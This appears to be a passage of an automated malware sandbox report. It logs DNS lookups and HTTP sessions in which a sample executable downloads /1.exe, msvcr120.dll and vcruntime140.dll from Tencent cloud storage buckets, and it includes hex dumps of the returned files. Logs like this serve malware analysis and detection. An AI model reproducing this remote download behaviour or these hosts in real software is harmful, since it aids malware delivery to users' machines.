                                                            Jul 25, 2024 17:10:07.906928062 CEST4434972343.153.232.152192.168.2.5
                                                            Jul 25, 2024 17:10:07.907191992 CEST49723443192.168.2.543.153.232.152
                                                            Jul 25, 2024 17:10:07.907200098 CEST4434972343.153.232.152192.168.2.5
                                                            Jul 25, 2024 17:10:07.907249928 CEST49723443192.168.2.543.153.232.152
                                                            Jul 25, 2024 17:10:07.912090063 CEST4434972343.153.232.152192.168.2.5
                                                            Jul 25, 2024 17:10:07.912167072 CEST49723443192.168.2.543.153.232.152
                                                            Jul 25, 2024 17:10:07.912172079 CEST4434972343.153.232.152192.168.2.5
                                                            Jul 25, 2024 17:10:07.912250042 CEST49723443192.168.2.543.153.232.152
                                                            Jul 25, 2024 17:10:07.913062096 CEST4434972343.153.232.152192.168.2.5
                                                            Jul 25, 2024 17:10:07.913137913 CEST49723443192.168.2.543.153.232.152
                                                            Jul 25, 2024 17:10:07.913142920 CEST4434972343.153.232.152192.168.2.5
                                                            Jul 25, 2024 17:10:07.913291931 CEST49723443192.168.2.543.153.232.152
                                                            Jul 25, 2024 17:10:07.914297104 CEST4434972343.153.232.152192.168.2.5
                                                            Jul 25, 2024 17:10:07.914364100 CEST49723443192.168.2.543.153.232.152
                                                            Jul 25, 2024 17:10:07.914367914 CEST4434972343.153.232.152192.168.2.5
                                                            Jul 25, 2024 17:10:07.914423943 CEST4434972343.153.232.152192.168.2.5
                                                            Jul 25, 2024 17:10:07.914464951 CEST49723443192.168.2.543.153.232.152
                                                            Jul 25, 2024 17:10:07.914566994 CEST49723443192.168.2.543.153.232.152
                                                            Jul 25, 2024 17:10:07.914582968 CEST4434972343.153.232.152192.168.2.5
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Jul 25, 2024 17:09:24.474505901 CEST5159353192.168.2.51.1.1.1
                                                            Jul 25, 2024 17:09:24.796689034 CEST53515931.1.1.1192.168.2.5
                                                            Jul 25, 2024 17:09:58.793559074 CEST5531253192.168.2.51.1.1.1
                                                            Jul 25, 2024 17:09:59.128614902 CEST53553121.1.1.1192.168.2.5
                                                            Jul 25, 2024 17:10:05.026292086 CEST5165153192.168.2.51.1.1.1
                                                            Jul 25, 2024 17:10:05.618834972 CEST53516511.1.1.1192.168.2.5
                                                            Jul 25, 2024 17:10:06.258692980 CEST5356577162.159.36.2192.168.2.5
                                                            Jul 25, 2024 17:10:07.451468945 CEST53505821.1.1.1192.168.2.5
                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Jul 25, 2024 17:09:24.474505901 CEST192.168.2.51.1.1.10x6704Standard query (0)kdll-1323571269.cos.ap-beijing.myqcloud.comA (IP address)IN (0x0001)false
                                                            Jul 25, 2024 17:09:58.793559074 CEST192.168.2.51.1.1.10x4bfbStandard query (0)leisuretrade-1323571269.cos.ap-beijing.myqcloud.comA (IP address)IN (0x0001)false
                                                            Jul 25, 2024 17:10:05.026292086 CEST192.168.2.51.1.1.10x2aeeStandard query (0)wwwqd-1323571269.cos.ap-singapore.myqcloud.comA (IP address)IN (0x0001)false
                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Jul 25, 2024 17:09:24.796689034 CEST1.1.1.1192.168.2.50x6704No error (0)kdll-1323571269.cos.ap-beijing.myqcloud.combj.file.myqcloud.comCNAME (Canonical name)IN (0x0001)false
                                                            Jul 25, 2024 17:09:24.796689034 CEST1.1.1.1192.168.2.50x6704No error (0)bj.file.myqcloud.com82.156.94.48A (IP address)IN (0x0001)false
                                                            Jul 25, 2024 17:09:24.796689034 CEST1.1.1.1192.168.2.50x6704No error (0)bj.file.myqcloud.com82.156.94.13A (IP address)IN (0x0001)false
                                                            Jul 25, 2024 17:09:24.796689034 CEST1.1.1.1192.168.2.50x6704No error (0)bj.file.myqcloud.com82.156.94.17A (IP address)IN (0x0001)false
                                                            Jul 25, 2024 17:09:24.796689034 CEST1.1.1.1192.168.2.50x6704No error (0)bj.file.myqcloud.com82.156.94.45A (IP address)IN (0x0001)false
                                                            Jul 25, 2024 17:09:24.796689034 CEST1.1.1.1192.168.2.50x6704No error (0)bj.file.myqcloud.com82.156.94.47A (IP address)IN (0x0001)false
                                                            Jul 25, 2024 17:09:59.128614902 CEST1.1.1.1192.168.2.50x4bfbNo error (0)leisuretrade-1323571269.cos.ap-beijing.myqcloud.combj.file.myqcloud.comCNAME (Canonical name)IN (0x0001)false
                                                            Jul 25, 2024 17:09:59.128614902 CEST1.1.1.1192.168.2.50x4bfbNo error (0)bj.file.myqcloud.com82.156.94.47A (IP address)IN (0x0001)false
                                                            Jul 25, 2024 17:09:59.128614902 CEST1.1.1.1192.168.2.50x4bfbNo error (0)bj.file.myqcloud.com82.156.94.48A (IP address)IN (0x0001)false
                                                            Jul 25, 2024 17:09:59.128614902 CEST1.1.1.1192.168.2.50x4bfbNo error (0)bj.file.myqcloud.com82.156.94.13A (IP address)IN (0x0001)false
                                                            Jul 25, 2024 17:09:59.128614902 CEST1.1.1.1192.168.2.50x4bfbNo error (0)bj.file.myqcloud.com82.156.94.17A (IP address)IN (0x0001)false
                                                            Jul 25, 2024 17:09:59.128614902 CEST1.1.1.1192.168.2.50x4bfbNo error (0)bj.file.myqcloud.com82.156.94.45A (IP address)IN (0x0001)false
                                                            Jul 25, 2024 17:10:05.618834972 CEST1.1.1.1192.168.2.50x2aeeNo error (0)wwwqd-1323571269.cos.ap-singapore.myqcloud.comsgp.file.myqcloud.comCNAME (Canonical name)IN (0x0001)false
                                                            Jul 25, 2024 17:10:05.618834972 CEST1.1.1.1192.168.2.50x2aeeNo error (0)sgp.file.myqcloud.com43.153.232.152A (IP address)IN (0x0001)false
                                                            Jul 25, 2024 17:10:05.618834972 CEST1.1.1.1192.168.2.50x2aeeNo error (0)sgp.file.myqcloud.com43.152.64.193A (IP address)IN (0x0001)false
                                                            Jul 25, 2024 17:10:05.618834972 CEST1.1.1.1192.168.2.50x2aeeNo error (0)sgp.file.myqcloud.com43.152.64.207A (IP address)IN (0x0001)false
                                                            Jul 25, 2024 17:10:05.618834972 CEST1.1.1.1192.168.2.50x2aeeNo error (0)sgp.file.myqcloud.com43.153.232.151A (IP address)IN (0x0001)false
                                                            • kdll-1323571269.cos.ap-beijing.myqcloud.com
                                                            • leisuretrade-1323571269.cos.ap-beijing.myqcloud.com
                                                            • wwwqd-1323571269.cos.ap-singapore.myqcloud.com
                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.54971482.156.94.484435780C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-07-25 15:09:26 UTC124OUTGET /1.exe HTTP/1.1
                                                            User-Agent: Mozilla/5.0
                                                            Host: kdll-1323571269.cos.ap-beijing.myqcloud.com
                                                            Cache-Control: no-cache
                                                            2024-07-25 15:09:27 UTC215INHTTP/1.1 404 Not Found
                                                            Content-Type: application/xml
                                                            Content-Length: 423
                                                            Connection: close
                                                            Date: Thu, 25 Jul 2024 15:09:26 GMT
                                                            Server: tencent-cos
                                                            x-cos-request-id: NjZhMjZhYTZfOWFhYzViNjRfMjJkM18yMDBmNGZj
                                                            2024-07-25 15:09:27 UTC423INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 75 74 66 2d 38 27 20 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 09 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 0a 09 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 0a 09 3c 52 65 73 6f 75 72 63 65 3e 2f 31 2e 65 78 65 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 09 3c 52 65 71 75 65 73 74 49 64 3e 4e 6a 5a 68 4d 6a 5a 68 59 54 5a 66 4f 57 46 68 59 7a 56 69 4e 6a 52 66 4d 6a 4a 6b 4d 31 38 79 4d 44 42 6d 4e 47 5a 6a 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 09 3c 54 72 61 63 65 49 64 3e 4f 47 56 6d 59 7a 5a 69 4d 6d 51 7a 59 6a 41 32 4f 57 4e 68 4f 44 6b 30 4e
                                                            Data Ascii: <?xml version='1.0' encoding='utf-8' ?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Resource>/1.exe</Resource><RequestId>NjZhMjZhYTZfOWFhYzViNjRfMjJkM18yMDBmNGZj</RequestId><TraceId>OGVmYzZiMmQzYjA2OWNhODk0N


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.54971582.156.94.484435780C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-07-25 15:09:28 UTC131OUTGET /msvcr120.dll HTTP/1.1
                                                            User-Agent: Mozilla/5.0
                                                            Host: kdll-1323571269.cos.ap-beijing.myqcloud.com
                                                            Cache-Control: no-cache
                                                            2024-07-25 15:09:29 UTC472INHTTP/1.1 200 OK
                                                            Content-Type: application/x-msdownload
                                                            Content-Length: 970744
                                                            Connection: close
                                                            Accept-Ranges: bytes
                                                            Content-Disposition: attachment
                                                            Date: Thu, 25 Jul 2024 15:09:29 GMT
                                                            ETag: "50097ec217ce0ebb9b4caa09cd2cd73a"
                                                            Last-Modified: Wed, 20 Mar 2024 20:21:49 GMT
                                                            Server: tencent-cos
                                                            x-cos-force-download: true
                                                            x-cos-hash-crc64ecma: 7136594693983466067
                                                            x-cos-request-id: NjZhMjZhYTlfZmFjMjBiMDlfNzAyNl8xZmFhZTg4
                                                            x-cos-server-side-encryption: AES256
                                                            2024-07-25 15:09:29 UTC7732INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 53 39 02 12 17 58 6c 41 17 58 6c 41 17 58 6c 41 ca a7 a7 41 14 58 6c 41 17 58 6d 41 a7 58 6c 41 51 09 8c 41 b9 5a 6c 41 51 09 b3 41 76 58 6c 41 51 09 89 41 21 58 6c 41 51 09 8d 41 af 58 6c 41 51 09 b0 41 16 58 6c 41 51 09 b7 41 16 58 6c 41 51 09 b2 41 16 58 6c 41 52 69 63 68 17 58 6c 41 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 e6 7c 4f 52 00 00 00 00 00 00 00 00 e0 00 22
                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$S9XlAXlAXlAAXlAXmAXlAQAZlAQAvXlAQA!XlAQAXlAQAXlAQAXlAQAXlARichXlAPEL|OR"
                                                            2024-07-25 15:09:30 UTC8184INData Raw: af 53 03 00 65 57 03 00 27 1f 0c 00 1f 76 0a 00 c4 b7 0a 00 46 e3 07 00 65 e3 07 00 d7 b3 07 00 84 3d 0a 00 49 15 03 00 12 03 0a 00 0f 2f 08 00 b1 2f 08 00 05 c1 02 00 27 e2 07 00 85 57 03 00 d2 7b 01 00 9c 33 08 00 5c ce 02 00 bf 3d 0a 00 63 89 08 00 46 e2 07 00 e4 34 08 00 ad 35 08 00 69 36 08 00 90 35 08 00 e5 38 08 00 04 39 08 00 86 36 08 00 a7 36 08 00 c9 36 08 00 ea 36 08 00 2b 44 03 00 7a 37 08 00 bd 25 03 00 7a 3a 08 00 97 37 08 00 b8 37 08 00 da 37 08 00 fb 37 08 00 e4 1a 0a 00 4a 1c 0a 00 6c 02 08 00 b0 02 08 00 00 03 08 00 42 03 08 00 92 03 08 00 d9 03 08 00 38 06 08 00 50 06 08 00 81 76 0a 00 d4 78 0a 00 24 39 08 00 3e 39 08 00 5a 39 08 00 77 39 08 00 94 39 08 00 b3 39 08 00 d1 e4 07 00 a3 e5 07 00 17 e5 07 00 5d e5 07 00 37 b8 0a 00 d1 b8 0a
                                                            Data Ascii: SeW'vFe=I//'W{3\=cF45i65896666+Dz7%z:7777JlB8Pvx$9>9Z9w999]7
                                                            2024-07-25 15:09:30 UTC8184INData Raw: 1f cd 00 00 2b cd 00 00 35 cd 00 00 41 cd 00 00 4c cd 00 00 59 cd 00 00 62 cd 00 00 6d cd 00 00 75 cd 00 00 7d cd 00 00 87 cd 00 00 90 cd 00 00 9b cd 00 00 a5 cd 00 00 af cd 00 00 b9 cd 00 00 c5 cd 00 00 d2 cd 00 00 dc cd 00 00 e7 cd 00 00 f2 cd 00 00 fd cd 00 00 0a ce 00 00 15 ce 00 00 21 ce 00 00 2e ce 00 00 36 ce 00 00 40 ce 00 00 4a ce 00 00 56 ce 00 00 61 ce 00 00 67 ce 00 00 71 ce 00 00 7d ce 00 00 8b ce 00 00 97 ce 00 00 a5 ce 00 00 b3 ce 00 00 be ce 00 00 cb ce 00 00 d8 ce 00 00 e2 ce 00 00 e8 ce 00 00 f1 ce 00 00 fa ce 00 00 02 cf 00 00 0a cf 00 00 14 cf 00 00 1d cf 00 00 28 cf 00 00 31 cf 00 00 3c cf 00 00 48 cf 00 00 54 cf 00 00 5c cf 00 00 63 cf 00 00 6c cf 00 00 77 cf 00 00 80 cf 00 00 8b cf 00 00 92 cf 00 00 9b cf 00 00 a2 cf 00 00 ab cf 00
                                                            Data Ascii: +5ALYbmu}!.6@JVagq}(1<HT\clw
                                                            2024-07-25 15:09:31 UTC8184INData Raw: 31 32 40 40 5a 00 3f 3f 30 5f 54 61 73 6b 43 6f 6c 6c 65 63 74 69 6f 6e 40 64 65 74 61 69 6c 73 40 43 6f 6e 63 75 72 72 65 6e 63 79 40 40 51 41 45 40 58 5a 00 3f 3f 30 5f 54 69 6d 65 72 40 64 65 74 61 69 6c 73 40 43 6f 6e 63 75 72 72 65 6e 63 79 40 40 49 41 45 40 49 5f 4e 40 5a 00 3f 3f 30 5f 5f 6e 6f 6e 5f 72 74 74 69 5f 6f 62 6a 65 63 74 40 73 74 64 40 40 51 41 45 40 41 42 56 30 31 40 40 5a 00 3f 3f 30 5f 5f 6e 6f 6e 5f 72 74 74 69 5f 6f 62 6a 65 63 74 40 73 74 64 40 40 51 41 45 40 50 42 44 40 5a 00 3f 3f 30 62 61 64 5f 63 61 73 74 40 73 74 64 40 40 41 41 45 40 50 42 51 42 44 40 5a 00 3f 3f 30 62 61 64 5f 63 61 73 74 40 73 74 64 40 40 51 41 45 40 41 42 56 30 31 40 40 5a 00 3f 3f 30 62 61 64 5f 63 61 73 74 40 73 74 64 40 40 51 41 45 40 50 42 44 40 5a 00
                                                            Data Ascii: 12@@Z??0_TaskCollection@details@Concurrency@@QAE@XZ??0_Timer@details@Concurrency@@IAE@I_N@Z??0__non_rtti_object@std@@QAE@ABV01@@Z??0__non_rtti_object@std@@QAE@PBD@Z??0bad_cast@std@@AAE@PBQBD@Z??0bad_cast@std@@QAE@ABV01@@Z??0bad_cast@std@@QAE@PBD@Z
                                                            2024-07-25 15:09:31 UTC8184INData Raw: 53 70 69 6e 57 61 69 74 40 24 30 41 40 40 64 65 74 61 69 6c 73 40 43 6f 6e 63 75 72 72 65 6e 63 79 40 40 49 41 45 58 58 5a 00 3f 5f 47 65 74 40 5f 43 75 72 72 65 6e 74 53 63 68 65 64 75 6c 65 72 40 64 65 74 61 69 6c 73 40 43 6f 6e 63 75 72 72 65 6e 63 79 40 40 53 41 3f 41 56 5f 53 63 68 65 64 75 6c 65 72 40 32 33 40 58 5a 00 3f 5f 47 65 74 43 6f 6e 63 52 54 54 72 61 63 65 49 6e 66 6f 40 43 6f 6e 63 75 72 72 65 6e 63 79 40 40 59 41 50 42 55 5f 43 4f 4e 43 52 54 5f 54 52 41 43 45 5f 49 4e 46 4f 40 64 65 74 61 69 6c 73 40 31 40 58 5a 00 3f 5f 47 65 74 43 6f 6e 63 75 72 72 65 6e 63 79 40 64 65 74 61 69 6c 73 40 43 6f 6e 63 75 72 72 65 6e 63 79 40 40 59 41 49 58 5a 00 3f 5f 47 65 74 43 75 72 72 65 6e 74 49 6e 6c 69 6e 65 44 65 70 74 68 40 5f 53 74 61 63 6b 47
                                                            Data Ascii: SpinWait@$0A@@details@Concurrency@@IAEXXZ?_Get@_CurrentScheduler@details@Concurrency@@SA?AV_Scheduler@23@XZ?_GetConcRTTraceInfo@Concurrency@@YAPBU_CONCRT_TRACE_INFO@details@1@XZ?_GetConcurrency@details@Concurrency@@YAIXZ?_GetCurrentInlineDepth@_StackG
                                                            2024-07-25 15:09:32 UTC8184INData Raw: 74 5f 74 6c 73 69 6e 64 65 78 00 5f 5f 67 65 74 6d 61 69 6e 61 72 67 73 00 5f 5f 69 6e 69 74 65 6e 76 00 5f 5f 69 6f 62 5f 66 75 6e 63 00 5f 5f 69 73 61 73 63 69 69 00 5f 5f 69 73 63 73 79 6d 00 5f 5f 69 73 63 73 79 6d 66 00 5f 5f 69 73 77 63 73 79 6d 00 5f 5f 69 73 77 63 73 79 6d 66 00 5f 5f 6c 63 6f 6e 76 00 5f 5f 6c 63 6f 6e 76 5f 69 6e 69 74 00 5f 5f 6c 69 62 6d 5f 73 73 65 32 5f 61 63 6f 73 00 5f 5f 6c 69 62 6d 5f 73 73 65 32 5f 61 63 6f 73 66 00 5f 5f 6c 69 62 6d 5f 73 73 65 32 5f 61 73 69 6e 00 5f 5f 6c 69 62 6d 5f 73 73 65 32 5f 61 73 69 6e 66 00 5f 5f 6c 69 62 6d 5f 73 73 65 32 5f 61 74 61 6e 00 5f 5f 6c 69 62 6d 5f 73 73 65 32 5f 61 74 61 6e 32 00 5f 5f 6c 69 62 6d 5f 73 73 65 32 5f 61 74 61 6e 66 00 5f 5f 6c 69 62 6d 5f 73 73 65 32 5f 63 6f 73
                                                            Data Ascii: t_tlsindex__getmainargs__initenv__iob_func__isascii__iscsym__iscsymf__iswcsym__iswcsymf__lconv__lconv_init__libm_sse2_acos__libm_sse2_acosf__libm_sse2_asin__libm_sse2_asinf__libm_sse2_atan__libm_sse2_atan2__libm_sse2_atanf__libm_sse2_cos
                                                            2024-07-25 15:09:32 UTC8184INData Raw: 6f 63 5f 63 72 74 5f 6d 61 78 5f 77 61 69 74 00 5f 73 65 74 5f 6f 75 74 70 75 74 5f 66 6f 72 6d 61 74 00 5f 73 65 74 5f 70 72 69 6e 74 66 5f 63 6f 75 6e 74 5f 6f 75 74 70 75 74 00 5f 73 65 74 5f 70 75 72 65 63 61 6c 6c 5f 68 61 6e 64 6c 65 72 00 5f 73 65 74 65 72 72 6f 72 6d 6f 64 65 00 5f 73 65 74 6a 6d 70 00 5f 73 65 74 6a 6d 70 33 00 5f 73 65 74 6d 61 78 73 74 64 69 6f 00 5f 73 65 74 6d 62 63 70 00 5f 73 65 74 6d 6f 64 65 00 5f 73 65 74 73 79 73 74 69 6d 65 00 5f 73 6c 65 65 70 00 5f 73 6e 70 72 69 6e 74 66 00 5f 73 6e 70 72 69 6e 74 66 5f 63 00 5f 73 6e 70 72 69 6e 74 66 5f 63 5f 6c 00 5f 73 6e 70 72 69 6e 74 66 5f 6c 00 5f 73 6e 70 72 69 6e 74 66 5f 73 00 5f 73 6e 70 72 69 6e 74 66 5f 73 5f 6c 00 5f 73 6e 73 63 61 6e 66 00 5f 73 6e 73 63 61 6e 66 5f
                                                            Data Ascii: oc_crt_max_wait_set_output_format_set_printf_count_output_set_purecall_handler_seterrormode_setjmp_setjmp3_setmaxstdio_setmbcp_setmode_setsystime_sleep_snprintf_snprintf_c_snprintf_c_l_snprintf_l_snprintf_s_snprintf_s_l_snscanf_snscanf_
                                                            2024-07-25 15:09:32 UTC8184INData Raw: 46 69 6c 65 20 74 6f 6f 20 6c 61 72 67 65 00 90 4e 6f 20 73 70 61 63 65 20 6c 65 66 74 20 6f 6e 20 64 65 76 69 63 65 00 49 6e 76 61 6c 69 64 20 73 65 65 6b 00 90 90 90 52 65 61 64 2d 6f 6e 6c 79 20 66 69 6c 65 20 73 79 73 74 65 6d 00 90 90 54 6f 6f 20 6d 61 6e 79 20 6c 69 6e 6b 73 00 90 42 72 6f 6b 65 6e 20 70 69 70 65 00 44 6f 6d 61 69 6e 20 65 72 72 6f 72 00 90 90 90 52 65 73 75 6c 74 20 74 6f 6f 20 6c 61 72 67 65 00 90 90 90 52 65 73 6f 75 72 63 65 20 64 65 61 64 6c 6f 63 6b 20 61 76 6f 69 64 65 64 00 90 90 46 69 6c 65 6e 61 6d 65 20 74 6f 6f 20 6c 6f 6e 67 00 90 90 4e 6f 20 6c 6f 63 6b 73 20 61 76 61 69 6c 61 62 6c 65 00 90 46 75 6e 63 74 69 6f 6e 20 6e 6f 74 20 69 6d 70 6c 65 6d 65 6e 74 65 64 00 90 90 90 44 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 65
                                                            Data Ascii: File too largeNo space left on deviceInvalid seekRead-only file systemToo many linksBroken pipeDomain errorResult too largeResource deadlock avoidedFilename too longNo locks availableFunction not implementedDirectory not e
                                                            2024-07-25 15:09:33 UTC8184INData Raw: 4e 00 4f 00 00 00 90 90 61 00 72 00 2d 00 54 00 4e 00 00 00 65 00 6e 00 2d 00 5a 00 41 00 00 00 65 00 73 00 2d 00 44 00 4f 00 00 00 73 00 72 00 2d 00 42 00 41 00 2d 00 43 00 79 00 72 00 6c 00 00 00 90 90 73 00 6d 00 61 00 2d 00 53 00 45 00 00 00 90 90 61 00 72 00 2d 00 4f 00 4d 00 00 00 65 00 6e 00 2d 00 4a 00 4d 00 00 00 65 00 73 00 2d 00 56 00 45 00 00 00 73 00 6d 00 73 00 2d 00 46 00 49 00 00 00 90 90 61 00 72 00 2d 00 59 00 45 00 00 00 65 00 6e 00 2d 00 43 00 42 00 00 00 65 00 73 00 2d 00 43 00 4f 00 00 00 73 00 6d 00 6e 00 2d 00 46 00 49 00 00 00 90 90 61 00 72 00 2d 00 53 00 59 00 00 00 65 00 6e 00 2d 00 42 00 5a 00 00 00 65 00 73 00 2d 00 50 00 45 00 00 00 61 00 72 00 2d 00 4a 00 4f 00 00 00 65 00 6e 00 2d 00 54 00 54 00 00 00 65 00 73 00 2d 00 41
                                                            Data Ascii: NOar-TNen-ZAes-DOsr-BA-Cyrlsma-SEar-OMen-JMes-VEsms-FIar-YEen-CBes-COsmn-FIar-SYen-BZes-PEar-JOen-TTes-A
                                                            2024-07-25 15:09:33 UTC8184INData Raw: 4c 24 04 2b c1 c3 8d 41 fc 8b 4c 24 04 2b c1 c3 8d 41 fe 8b 4c 24 04 2b c1 c3 8d 41 fd 8b 4c 24 04 2b c1 c3 55 8b ec 8b 55 14 8b 4d 08 56 85 d2 0f 84 5f e5 00 00 85 c9 0f 84 64 e5 00 00 8b 45 0c 85 c0 0f 84 59 e5 00 00 85 d2 0f 84 5b e5 00 00 8b 75 10 85 f6 0f 84 a2 38 04 00 53 8b d9 57 8b f8 83 fa ff 75 1e 2b de 8a 06 88 04 33 46 84 c0 74 03 4f 75 f3 85 ff 5f 5b 0f 84 d5 bf 01 00 33 c0 5e 5d c3 2b f1 8a 04 1e 88 03 43 84 c0 74 06 4f 74 03 4a 75 f0 85 d2 75 db 88 13 eb d7 55 56 57 53 8b ea 33 c0 33 db 33 d2 33 f6 33 ff ff d1 5b 5f 5e 5d c3 55 8b ec 83 ec 18 8b 45 08 8b 55 0c 53 8b 5d 14 56 57 c6 45 ff 00 8b 7b 08 8d 73 10 33 38 c7 45 f4 01 00 00 00 8b 07 83 f8 fe 0f 85 a5 d1 04 00 8b 47 08 8b 4f 0c 03 ce 33 0c 30 ff d2 8b 45 10 f6 40 04 66 0f 85 24 d5 00
                                                            Data Ascii: L$+AL$+AL$+AL$+UUMV_dEY[u8SWu+3FtOu_[3^]+CtOtJuuUVWS33333[_^]UEUS]VWE{s38EGO30E@f$


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.54971882.156.94.484435780C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-07-25 15:09:43 UTC135OUTGET /vcruntime140.dll HTTP/1.1
                                                            User-Agent: Mozilla/5.0
                                                            Host: kdll-1323571269.cos.ap-beijing.myqcloud.com
                                                            Cache-Control: no-cache
                                                            2024-07-25 15:09:43 UTC476INHTTP/1.1 200 OK
                                                            Content-Type: application/x-msdownload
                                                            Content-Length: 91104
                                                            Connection: close
                                                            Accept-Ranges: bytes
                                                            Content-Disposition: attachment
                                                            Date: Thu, 25 Jul 2024 15:09:43 GMT
                                                            ETag: "9c133b18fa9ed96e1aeb2da66e4a4f2b"
                                                            Last-Modified: Wed, 20 Mar 2024 20:24:50 GMT
                                                            Server: tencent-cos
                                                            x-cos-force-download: true
                                                            x-cos-hash-crc64ecma: 15584681233261869999
                                                            x-cos-request-id: NjZhMjZhYjdfOTY0ZTQ0MGJfMTNiZjNfM2ViMmU3Zg==
                                                            x-cos-server-side-encryption: AES256
                                                            2024-07-25 15:09:43 UTC7728INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a5 8f b4 8a e1 ee da d9 e1 ee da d9 e1 ee da d9 32 9c db d8 e3 ee da d9 e8 96 49 d9 ea ee da d9 e1 ee db d9 c8 ee da d9 e7 6f d9 d8 f2 ee da d9 e7 6f de d8 f7 ee da d9 e7 6f df d8 fd ee da d9 e7 6f da d8 e0 ee da d9 e7 6f 25 d9 e0 ee da d9 e7 6f d8 d8 e0 ee da d9 52 69 63 68 e1 ee da d9 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 04 73 87 13 00 00 00 00 00 00 00 00 e0 00 22
                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$2Iooooo%oRichPELs"
                                                            2024-07-25 15:09:44 UTC8184INData Raw: 00 00 00 00 c8 28 00 00 1c 00 00 00 2e 72 64 61 74 61 24 73 78 64 61 74 61 00 00 00 e4 28 00 00 b0 00 00 00 2e 72 64 61 74 61 24 76 6f 6c 74 6d 64 00 00 00 94 29 00 00 3c 02 00 00 2e 72 64 61 74 61 24 7a 7a 7a 64 62 67 00 00 00 d0 2b 00 00 13 ce 00 00 2e 74 65 78 74 24 6d 6e 00 00 00 00 e3 f9 00 00 4d 00 00 00 2e 74 65 78 74 24 78 00 30 fa 00 00 10 03 00 00 2e 78 64 61 74 61 24 78 00 00 00 00 40 fd 00 00 14 09 00 00 2e 65 64 61 74 61 00 00 00 10 01 00 94 00 00 00 2e 64 61 74 61 00 00 00 94 10 01 00 b8 00 00 00 2e 64 61 74 61 24 72 00 4c 11 01 00 b4 00 00 00 2e 64 61 74 61 24 72 73 00 00 00 00 00 12 01 00 64 04 00 00 2e 62 73 73 00 00 00 00 00 20 01 00 bc 00 00 00 2e 69 64 61 74 61 24 35 00 00 00 00 bc 20 01 00 08 00 00 00 2e 30 30 63 66 67 00 00 c4 20 01
                                                            Data Ascii: (.rdata$sxdata(.rdata$voltmd)<.rdata$zzzdbg+.text$mnM.text$x0.xdata$x@.edata.data.data$rL.data$rsd.bss .idata$5 .00cfg
                                                            2024-07-25 15:09:44 UTC16368INData Raw: 14 0f 84 87 00 00 00 0f b6 c8 0f b6 42 14 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 9b 05 00 00 0f b6 4e 15 0f b6 42 15 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 79 05 00 00 0f b6 4e 16 0f b6 42 16 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 57 05 00 00 0f b6 4e 17 0f b6 42 17 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 35 05 00 00 8b 46 18 3b 42 18 0f 84 87 00 00 00 0f b6 c8 0f b6 42 18 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 08 05 00 00 0f b6 4e 19 0f b6 42 19 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 e6 04 00 00 0f b6 4e 1a 0f b6 42 1a 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 c4 04 00 00
                                                            Data Ascii: B+t3ENB+t3EyNB+t3EWNB+t3E5F;BB+t3ENB+t3ENB+t3E
